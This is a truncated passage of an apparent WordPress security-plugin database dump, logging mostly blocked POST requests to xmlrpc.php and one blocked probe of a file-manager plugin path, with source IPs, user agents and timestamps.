Safari\\/537.36\"}','c7tLMqg1H6BDsA5GmYUfdVE9',0,1681003758.6083,3406,'','POST',403,0,515,0,1,'',0),('141.98.102.243',2372036339,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Uwc46aF1WuhvInGO8o5KiB3V',0,1681005268.7093,2672,'','POST',403,0,515,0,1,'',0),('192.30.89.75',3223214411,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DzuQiU4YcWa6H2olOdpvnFAE',0,1681005447.2048,3443,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','ZgmNFDYu7Ey1WQRnAHbTMhJP',0,1681005695.3851,1982,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','xKOs7L5VX1qUFvhtSGCuDmNi',0,1681005693.9061,3964,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','a94Rq3lhUeOFHCvKBT7ru8DM',0,1681005696.2552,1921,'','POST',403,0,515,0,1,'',0),('139.180.134.149',2343863957,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','B9Mp8Yc0KHGAdmT6hQOiPvnR',0,1681005706.5328,622,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','5RuqODnV7izpfwyv3HEdBtL2',0,1681005708.1069,1451,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','4zAIEByjWvUwRinbZOTgGqaX',0,1681005712.6663,979,'','POST',403,0,515,0,1,'',0),('185.141.106.144',3113052816,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','28D6WlCth0aPXKAenIpjOqmx',0,1681005725.7911,607,'','POST',403,0,515,0,1,'',0),('195.206.105.227',3285084643,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','pETURHaViP9xX0D4ZSk2odb7',0,1681005881.4408,2693,'','POST',403,0,515,0,1,'',0),('192.30.89.59',3223214395,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tVogOZmXr09lJL5RMHh8fx3A',0,1681006433.9423,3814,'','POST',403,0,515,0,1,'',0),('185.200.117.131',3116922243,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9EJ31M8sdCAewpc0QXqlDoGz',0,1681008366.6931,4354,'','POST',403,0,515,0,1,'',0),('213.152.161.138',3583549834,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','VOfZQGigKxWD7aS3mpw6RsTy',0,1681008526.1450,684,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','VefTrFqxJ5XMGKs6p2EwgjnD',0,1681009700.4129,3629,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','UxOAPzj23brEDCen1tsvqKS9',0,1681009706.1284,632,'','POST',403,0,515,0,1,'',0),('190.104.235.180',3194547124,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','rTLskgUvSWdDVb4hCjami26E',0,1681009721.1553,564,'','POST',403,0,515,0,1,'',0),('79.170.40.175',1336551599,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','Gjo0Ku7SA1NUnQmcXWCbiOdR',0,1681009733.8735,580,'','POST',403,0,515,0,1,'',0),('47.88.33.72',794304840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','x2eh0Ca1HEpK4nFWduYz6Jrk',0,1681009737.4120,857,'','POST',403,0,515,0,1,'',0),('5.231.78.38',99044902,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ZPfEjBYr58G1pqJUouHSXl4D',0,1681009738.0589,790,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','ZmAzCq8F3vEScDNuxJLBG9Mp',0,1681009741.7362,638,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','N7O5g3Vo0t2E1GrfDISqsJjT',0,1681009743.9432,587,'','POST',403,0,515,0,1,'',0),('199.249.223.130',3355041666,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2YS8WHMT6neF4dk0sCAEbO5h',0,1681009871.8609,1613,'','POST',403,0,515,0,1,'',0),('184.75.221.3',3091979523,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lFi8DSrvGzn6RfM5Wq4YQp2J',0,1681010334.1939,3566,'','POST',403,0,515,0,1,'',0),('134.19.179.179',2249438131,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LctQehnYA29wIadMOT4Kxuml',0,1681010814.2509,2808,'','POST',403,0,515,0,1,'',0),('157.245.147.60',2650116924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','58jh0MiJLOcPUB1d2NxEKumb',0,1681011926.4581,1785,'','POST',403,0,515,0,1,'',0),('104.37.86.31',1747277343,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','fca1egPXFvhmtMQRniNkuU4S',0,1681011924.6635,4014,'','POST',403,0,515,0,1,'',0),('185.232.250.86',3119053398,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','0isCya8LgtnRAcXJedjfWSkF',0,1681011935.7078,625,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','RkENS5tydsKlzjGercAw0QIH',0,1681011944.4532,622,'','POST',403,0,515,0,1,'',0),('92.51.149.160',1546884512,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','qVfvLKWBMienu5Nh8j9w1JPb',0,1681011956.9589,641,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','xe1OivEF6nscqDfNH2G5MjkX',0,1681012887.2767,4405,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','7fEb3r0wTxYFpOlA9Mo5hUJ2',0,1681012891.1554,1096,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','ZiR4tMcO6IvUfHD89akj0GqB',0,1681012893.6505,731,'','POST',403,0,515,0,1,'',0),('86.48.1.153',1445986713,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','uHv93dpZXo17GmP5hlWqwJtE',0,1681012899.9028,614,'','POST',403,0,515,0,1,'',0),('107.167.244.51',1806169139,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','aqcYT4Sp8JuF2N06rIbykxPW',0,1681012927.4163,614,'','POST',403,0,515,0,1,'',0),('107.167.244.51',1806169139,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZAiEkqy2OoLz6UFNvS1uITrH',0,1681012971.9122,947,'','POST',403,0,515,0,1,'',0),('213.152.187.230',3583556582,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qjbSYy0tZTLJ3N9CmBWgeEnX',0,1681013954.9677,5315,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','3nQfVudXKU4PJBYlM27EF6cT',0,1681013962.1990,589,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','geAFNfLvbqotTjSD8Vk17OZ4',0,1681013965.1570,558,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','X02FWxas1UMozONwtED7Qmcq',0,1681013967.9585,592,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','KIFVdqgumBPXRTHGz8WeUxM4',0,1681013975.7381,606,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','jskvQ704LJequwtU2ZalDXiH',0,1681013979.2928,715,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','NC42aWmFb69GKgD8YvdyQjXi',0,1681013985.2306,614,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','ud7JHSAXIYawFiDL3VRjUcOn',0,1681013989.1364,605,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','ZAS7MKqxT4YCtBnQFiLo3jPG',0,1681013992.1020,1387,'','POST',403,0,515,0,1,'',0),('154.53.38.46',2587174446,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','YUriS6XaMlKbdZT5wpyJ0q8B',0,1681013996.6861,1465,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','hBQ1qjmnvowrYOsAWbEuzaSk',0,1681013996.8551,1416,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eL3Dfy2t80qcpQSNO96o7dhW',0,1681014007.5598,447,'','POST',404,0,515,0,1,'',0),('213.152.187.210',3583556562,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TZvu9HdO0UxYSRpM2bhI75Xk',0,1681014696.2813,1455,'','POST',403,0,515,0,1,'',0),('199.249.230.7',3355043335,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PSYvyhg0nOXJmwfj5HaW2NZA',0,1681015810.6077,3602,'','POST',403,0,515,0,1,'',0),('213.152.161.101',3583549797,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rzD75j9b8FVCnwOEWe62JpdU',0,1681015923.8507,616,'','POST',403,0,515,0,1,'',0),('213.152.161.10',3583549706,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','l6SJUnH8t0Q5XNMyVIGA3P9j',0,1681039183.9674,598,'','POST',403,0,515,0,1,'',0),('184.75.221.211',3091979731,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','VqHfYdDaxhBnOyemUMSpkK4C',0,1681040293.0727,578,'','POST',403,0,515,0,1,'',0),('147.78.47.249',2471374841,'','http://cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Safari\\/537.36\"}','kBOjmtT17vy65ciHpI9EPQZN',0,1681040318.6405,293,'','GET',403,0,700,0,1,'',0),('46.19.137.116',773032308,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dg8P2fZrFWREatVIiu7GSxLw',0,1681040869.6885,598,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','eRPhOxrYjQV4mK35iMo9kuTg',0,1681042376.1823,1821,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','GCfk9oAh78wrnUjeBLWKVypx',0,1681042376.2597,2565,'','POST',403,0,515,0,1,'',0),('213.136.93.169',3582483881,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','P3oSEwpWOIeNyKsFU68Mr1Am',0,1681042385.1392,564,'','POST',403,0,515,0,1,'',0),('5.9.220.53',84532277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','AF09Uw8oMtuijO5Xn6QRqheL',0,1681042389.5114,592,'','POST',403,0,515,0,1,'',0),('198.23.62.79',3323412047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','uCyGbonUQEFskKTO4SIf189A',0,1681042393.2644,592,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','R45XUg8IvhwAabxMsjoQHcqL',0,1681042399.6871,602,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','oXNJ5AVDRGqQPnmShxBjIY3b',0,1681042401.2825,568,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','9MFibyHOSjd0DvLWs62ErNph',0,1681042407.5820,539,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','2mTUgvA9bcIyNLfneMQxW4kD',0,1681042420.7341,599,'','POST',403,0,515,0,1,'',0),('194.187.251.163',3267099555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gQOpvDzAYINf49PELumbaZhB',0,1681042548.7482,1512,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','J0M6A4SBT29XbxYWyenzCqvi',0,1681042839.5039,1710,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','6qCPyandOfbHzipm2ue9LNx1',0,1681042842.5709,588,'','POST',403,0,515,0,1,'',0),('142.93.86.83',2388481619,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','CLMPXoZ12uAvR8OwnU5b0te4',0,1681042843.4626,590,'','POST',403,0,515,0,1,'',0),('148.72.232.52',2487806004,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','P6puCl4KUO2Wa3yRxhdSGErI',0,1681042846.9965,580,'','POST',403,0,515,0,1,'',0),('34.95.136.51',576686131,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','O6VH9zQ7GdUxZ054kRJFvh2N',0,1681042851.5383,583,'','POST',403,0,515,0,1,'',0),('152.67.12.146',2554530962,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','ajpMhSCUDNfd7T2YwOEQWmg8',0,1681042861.8970,1062,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','DOrWIHBjF6Xbq8mvU3KxPgkZ',0,1681042862.3598,1587,'','POST',403,0,515,0,1,'',0),('134.209.234.177',2261904049,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','s0m8xLg4HiUOPdMIF63Ry5kB',0,1681042863.2676,1101,'','POST',403,0,515,0,1,'',0),('156.224.21.75',2631931211,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','wn3pd2ckzi4XlD0ts8YVmFgN',0,1681042875.6606,557,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','skSM5rWCwPmGq4E9lcUdNgLv',0,1681042878.2559,544,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/?action=logout&_wpnonce=6383bc20b2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?action=logout&_wpnonce=e4c4cfca0d\"}','2L1Wa687YGHk0hv5RZTxJscy',3,1681043540.7668,395,'','GET',302,0,600,0,1,'',510),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?loggedout=true\"}','HoRz5b4hV62vCnesurXmBNpK',3,1681043544.7260,414,'','POST',302,0,600,0,1,'',510),('217.138.195.27',3649749787,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gm1FGas4LxVtew0RZdXJIkNO',0,1681045894.9687,643,'','POST',403,0,515,0,1,'',0),('62.102.148.156',1046910108,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Ydia7oFKCjNAJ83m90wIPShX',0,1681047394.6318,601,'','POST',403,0,515,0,1,'',0),('192.30.89.59',3223214395,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cO76S3iFnCD04kzjl8smZJKy',0,1681048354.7096,2724,'','POST',403,0,515,0,1,'',0),('184.168.115.25',3098047257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','y5bDRGmsWK2AjuMzePnrvOFl',0,1681049217.7999,1165,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','UVJ2Yax4T9Oh0Wpmi86kSCLn',0,1681049218.3464,1030,'','POST',403,0,515,0,1,'',0),('79.170.40.175',1336551599,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 